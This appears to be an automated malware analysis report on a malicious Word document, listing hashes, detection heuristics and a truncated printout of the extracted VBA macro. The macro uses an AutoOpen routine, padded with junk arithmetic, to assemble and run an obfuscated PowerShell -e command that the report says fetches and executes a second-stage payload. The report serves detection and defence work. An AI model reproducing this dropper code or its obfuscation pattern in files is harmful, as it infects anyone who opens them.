Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2bf755223c742a1…

MALICIOUS

Office (OLE)

Size: 84.0 KB
Created: 2018-06-07 16:57:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: d194ce187403cdf2b527014940f46fbf
SHA-1: 324d5b27ec4bebed6fcfe287863f2935402383bb
SHA-256: f2bf755223c742a1fcf22b0b04dce33f08365d94bab97e1707f6bb2e240ebd9d
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro with an Autoopen subroutine. This subroutine calls the Shell function, which is used to execute a command. The reconstructed command string indicates the execution of PowerShell with encoded arguments, suggesting it downloads and executes a second-stage payload. The presence of the Shell() call and the Autoopen macro are critical indicators of malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Shell-7361547-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Shell-7361547-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10932 bytes
SHA-256: 9e3541722b7a375ffdcda8b8d787698a4c848a384e1fb53ecdf1dc8ec03ea53a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XrQphZPwvdk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MTUsjcVA()
On Error Resume Next
ljzLC = Tan(NmzZGV _
* Tan(cfroEi * Int(ZzdtE * Sqr(83911) / hAXnM + Fix(68393)) / 84274 * Round(5138 / Log(50985 - aJsOSn) + 83228 - jaNAs)) _
/ 7766 + Log(48814))
zwlFGH = Tan(Fjlal _
* Tan(lkZEAO * Int(mEHMmp * Sqr(44623) / JjITO + Fix(65502)) / 69086 * Round(87873 / Log(32777 - kSwni) + 62364 - FJvqn)) _
/ 91626 + Log(84220))
MTUsjcVA = iIChAQoq + Shell(tsdtj + Chr(WXbZj + vbKeyP + dNvYN) + XKvbi + fAWjCPjRn + YrumT + iQLfw, 36301 - 36301)
isvrZT = Tan(jtwzd _
* Tan(XLBqI * Int(PvwwWa * Sqr(98876) / fcaVlQ + Fix(56922)) / 69121 * Round(79382 / Log(78424 - rBTiF) + 82925 - CFhwtz)) _
/ 59177 + Log(22504))
End Function
Sub Autoopen()
On Error Resume Next
thtYQZ = Tan(kHSaON _
* Tan(nWNoRi * Int(MrHnXt * Sqr(98661) / jbqZoj + Fix(4688)) / 91324 * Round(30747 / Log(73176 - OjbmQ) + 37896 - btbjLN)) _
/ 55671 + Log(61209))
MTUsjcVA
qlksjn = Tan(YrjpY _
* Tan(lazCwU * Int(lErUi * Sqr(34253) / FCPcw + Fix(16597)) / 5344 * Round(23496 / Log(18409 - tmbjCv) + 63144 - QhIAiJ)) _
/ 28471 + Log(17075))
End Sub



Attribute VB_Name = "vluQKOhzV"
Function XKvbi()
On Error Resume Next
wAmWXT = Tan(BNUoY _
* Tan(GJlzc * Int(ucqzH * Sqr(62788) / XaWRW + Fix(66347)) / 22365 * Round(61411 / Log(81439 - wKBbfL) + 98581 - OcNEwN)) _
/ 27827 + Log(26430))
HCzlXVWCuT = "owersH" + "eLL -e IAAoAE4A" + "ZQBXAC0A" + "bwBCAEoAZQBDAHQ" + "AI" + "AAgAHMA" + "WQBTAHQ" + "AZQBtAC4AaQBP" + "AC4AYwBPAE0AcA"
GGFCi = Tan(Svdfvz _
* Tan(NlPJm * Int(bkPRrJ * Sqr(87693) / sTiJD + Fix(17730)) / 46172 * Round(9894 / Log(49467 - zUVjfB) + 62699 - qIObo)) _
/ 74149 + Log(52269))
ZzrIqWhCk = "ByAGUA" + "cwBzAEkAbwB" + "OAC4ARABF" + "AGYAbABBAF" + "QAZQBTAHQAU" + "gBFAEEAbQAo" + "ACAAWwBTAHkAcwB"
maroNt = Tan(kZczVr _
* Tan(iILiMS * Int(rENkn * Sqr(37197) / pRirhb + Fix(43472)) / 95839 * Round(26999 / Log(70715 - EikKD) + 3925 - MBZGP)) _
/ 18766 + Log(50633))
JwMrQbuiizf = "0AEUAbQAuAEkAbw" + "AuAE0AZQBNAG8" + "AUgB" + "5AHMAd"
JuVdE = Tan(ZzvIzI _
* Tan(PSkubH * Int(jhhBL * Sqr(50008) / RLiBUR + Fix(48147)) / 34801 * Round(53249 / Log(54366 - jzijpC) + 10506 - WwjpMo)) _
/ 4517 + Log(35326))
GMaOJUMol = "AByAGUAYQBNA" + "F0AIABbA" + "FMAeQ" + "BzAFQAZQBNAC4AQ"
cNURi = Tan(HoMGcq _
* Tan(zqIJu * Int(dArfv * Sqr(34041) / fiVWN + Fix(35588)) / 97834 * Round(98978 / Log(79293 - ISCwW) + 90488 - vcDHws)) _
/ 64384 + Log(6472))
tWGlXwVo = "wBvAE" + "4Ad" + "gBlAHIAVABd" + "ADoAO" + "gBmAFIATwBtAG" + "IAQQBzA" + "EUANgA0AHM" + "AdABSAE" + "kA" + "bgB"
soZlhY = Tan(aTZSq _
* Tan(KrPIcA * Int(sLGEOj * Sqr(37263) / vjpoS + Fix(36603)) / 50254 * Round(19062 / Log(49874 - jjSbf) + 94582 - mCSLsp)) _
/ 32406 + Log(64214))
LishOz = "HACgAJwBWAFoAQ" + "gB" + "kAFQA" + "OABJAHc" + "AR"
BhiUW = Tan(Flfmkd _
* Tan(akipE * Int(QXRfJc * Sqr(53924) / BDDqYH + Fix(11328)) / 33484 * Round(86320 / Log(53243 - hiihw) + 85842 - wPchd)) _
/ 4856 + Log(71989))
SGPUcWvIkV = "gBJAGIAL" + "wBTAG" + "kAKwBXAEQA" + "QwBLAD" + "AAUQAwAFUASgBp" + "AHcAawBFAHgAQQB" + "zAE"
QpkBY = Tan(uRDibw _
* Tan(WRIrG * Int(XNlqVn * Sqr(93086) / NFTaBF + Fix(6750)) / 80912 * Round(32409 / Log(63268 - DNnQaz) + 39514 - BbzTqW)) _
/ 35208 + Log(27716))
qhYXzc = "YAaQBaAE4Ab" + "wBpA" + "EkAbgBw" + "ADEAagBO" + "AF"
XKvbi = HCzlXVWCuT + ZzrIqWhCk + JwMrQbuiizf + GMaOJUMol + tWGlXwVo + LishOz + SGPUcWvIkV + qhYXzc
End Function
Function fAWjCPjRn()
On Error Resume Next
fwPOc = Tan(hLjHa _
* Tan(HjAcAD * Int(kwKrA * Sqr(81760) / BPldDi + Fix(82421)) / 92526 * Round(21153 / Log(35119 - cawFF) + 82700 - uFtuwr)) _
/ 80986 + Log(37200))
sGnGmIBAM = "cASwBlADMAcwBE" + "AG8AeQBQAD" + "gATg" + "A4AH" + "QAQQBUAEgAZQBu" + "AE8AUwBjADk" + "AMwBuAFA" + "AbAB6AGUATwB" + "IAHIAUAA4AG0AZA"
iKUHPX = Tan(MRZGDr _
* Tan(LViKXc * Int(irTzG * 
... (truncated)